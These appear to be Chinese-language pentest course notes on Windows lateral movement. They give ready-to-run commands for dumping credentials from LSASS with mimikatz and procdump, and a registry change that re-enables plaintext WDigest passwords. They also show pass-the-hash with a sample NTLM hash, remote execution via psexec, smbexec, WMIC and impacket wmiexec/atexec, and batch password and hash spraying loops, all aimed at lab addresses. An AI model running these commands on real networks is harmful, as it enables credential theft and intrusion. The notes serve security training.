PTH,SMB及WMI橫向移動
利用NTLM、Kerberos及SMB等協議。
攻擊者進入內網后會進行橫向移動建立多個立足點,常見的技巧包括憑證竊取、橫向移動、Pass The Hash(hash傳遞)、導出域成員Hash、黃金白銀票據、MS14-068,MS17-010等。其中本次課程將圍繞NTLM,SMB協議相關攻擊進行講解,涉及明文 及Hash在獲取后的相關測試思路。
知識普及:
135端口:
RPC 遠程過程調用服務。WMIC用到這個端口,winsows management instrumentation
檢測:
nmap ip
telnet ip 135
wmic /node:ip /user:用戶名 /password:密碼 PROCESS call create "calc.exe" //打開一個計算器
wmic /node:192.168.33.141 /user:administrator /password:wang PROCESS call create "calc.exe"
445端口:共享文件夾,共享打印機
Hash獲取
#mimikatz //主要使用
mimikatz.exe上執行:
privilege::debug
sekurlsa::logonpasswords full
有個NTLM值
LM:2008之前用的密碼傳遞方式
NTLM:2008之后采用的密碼傳遞方式,里面的值就是哈希值
當目標為win10或2012R2以上時,默認在內存緩存中禁止保存明文密碼,但可以通過修改注冊表的方式抓取明文。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#procdump //不太強大,唯一的好處就是免殺的,微軟官方的產品
procdump.exe -accepteula -ma lsass.exe lsass.dmp //導出名字為lsass.dup
mimikatz.exe上執行(還原哈希憑據):
sekurlsa::minidump lsass.dmp //導出
sekurlsa::logonPasswords full //還原
Hash解密
Hashcat
第三方解密平台
PTH傳遞(不太推薦)
彈出一個窗口
#適用范圍:
域/工作組環境
內網中存在和當前機器相同的密碼
mimikatz.exe上執行:
privilege::debug
sekurlsa::pth /user:administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7
可以遠程訪問
#測試net use \\192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$
橫向滲透SMB 445端口 (有點難度)
#利用SMB服務需要先建立IPC,可以通過hash傳遞來遠程執行,默認回來System權限,需要目標防火牆開啟445並允許通過。
#在psexec中由於其利用條件和監控嚴格后,逐漸開始使用WMI進行攻擊。WMI可以描述為管理Windows系統的方法和功能。我們可以把它當作API來與Win系統進行相互交流。WMI在滲透測試中的價值在於它不需要下載和安裝,WMI是Windows系統自帶功能。而且整個運行過程都在計算機內存中發生,不會留下任何痕跡。
https://www.cnblogs.com/sup3rman/p/12381874.html
#psexec 需要先有ipc鏈接 明文或hash傳遞(所以不太推薦)
PS-tool里面有
psexec \\192.168.3.21 cmd # 需要先有ipc鏈接
psexec \\192.168.3.21 -u administrator -p password cmd
# 直接提供明文賬戶密碼,可以不用建立IPC
psexec \\192.168.3.21 -u administrator -p password -s cmd
# -s 指定以System權限運行
psexec.exe -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21
#smbexec 無需先ipc鏈接 明文或hash傳遞 exe版本,下面有下載連接
smbexec ./admin:password@192.168.3.21 //普通用戶密碼連接
smbexec domain/admin:password@192.168.3.21 //域密碼連接
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 //哈希連接
在內網中,知道明文密文都可以通過這種連接
橫向滲透WMI(推薦)
#自帶WMIC 明文傳遞 無回顯
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"
寫入命令到192.168.3.21
#自帶cscript明文傳遞 有回顯 //需要下載個wmiexec.vbs
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345
#套件impacket wmiexec 明文或hash傳遞 有回顯
#py版本
#exe版本
wmiexec ./administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :$HASH$ ./admin@192.168.3.21 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
#批量測試內網主機用戶密碼
FOR /F %%i in (ips.txt) do wmiexec.exe -hashes :HASH ./administrator@%%i whoami
#利用hash驗證主機列表ips.txt
atexec.exe換成wmiexec.exe
FOR /F %%i in (hashes.txt) do atexec.exe -hashes %%i ./administrator@192.168.3.76 whoami
#指定主機進行用戶hash列表(hashes.txt)爆破
FOR /F %%i in (passwords.txt) do atexec.exe ./administrator:%%i@192.168.3.76 whoami
#指定主機進行明文密碼列表(passwords.txt)爆破
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:password123@%%i whoami
# 利用明文密碼驗證主機列表ips.txt
推薦手寫,可以提高自己技術
k8scan 國產的 改名了k8 ladon
https://github.com/k8gege/Ladon
涉及資源:
https://github.com/hashcat/hashcat
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/SecureAuthCorp/impacket
https://gitee.com/RichChigga/impacket-examples-windows
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump